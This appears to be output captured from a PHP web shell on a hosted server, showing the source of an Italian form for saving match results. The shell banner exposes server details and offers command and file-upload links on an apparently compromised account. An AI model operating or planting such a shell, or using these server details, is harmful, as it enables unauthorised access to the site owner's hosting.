|
Server IP : 10.111.20.6 / Your IP : 216.73.217.121 Web Server : Apache System : Linux webm006.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : edizioni ( 7252) PHP Version : 8.3.23 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/edizioni/stampaeweb/../wordpress/../extonymask/libraries/astroid/../../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
require_once("support/funformat.php");
?>
<form id="form2" name="form" method="post" action="salva-partita">
<table width="50%">
<tr><td style="font-size:16px;">Data Incontro</td><td><input name="txtdapa" type="text" maxlength="10" size="10"></td></tr>
<tr><td style="font-size:16px;">Avversario</td><td><input name="txtplay1" type="textarea" maxlength="30" /></td></tr>
<tr><td style="font-size:16px;">Luogo</td><td><input name="txtsuper" type="textarea" maxlength="20"/></td></tr>
<tr><td style="font-size:16px;">Note</td><td><input name="txtnote" type="textarea" maxlength="30"/></td></tr>
<tr><td style="font-size:16px;">Risultato</td><td><input style="text-align:center; font-size:14px; width:40px;" name="txtset1" type="textarea" maxlength="6"/>
<input style="text-align:center; font-size:14px; width:40px;" name="txtset2" type="textarea" maxlength="6"/>
<input style="text-align:center; font-size:14px; width:40px;" name="txtset3" type="textarea" maxlength="6"/>
<input style="text-align:center; font-size:14px; width:40px;" name="txtset4" type="textarea" maxlength="6"/>
<input style="text-align:center; font-size:14px; width:40px;" name="txtset5" type="textarea" maxlength="6"/>
</td></tr>
<tr><td style="font-size:16px;">Esito</td><td><select size="1" height="1" name="scegli" style="font-size:16px;">
<option value='V'>Vinta</option>
<option value='N'>Nulla</option>
<option value='P'>Persa</option>
</select></td></tr>
<tr><td style="font-size:16px;">Codice Verifica</td><td><input name="txtcodice" type="textarea" maxlength="20"/></td></tr>
</table>
<input type="reset" name="Submit" value=" Annulla " />
<input type="submit" name="cmdsalva" value=" Salva " /></form>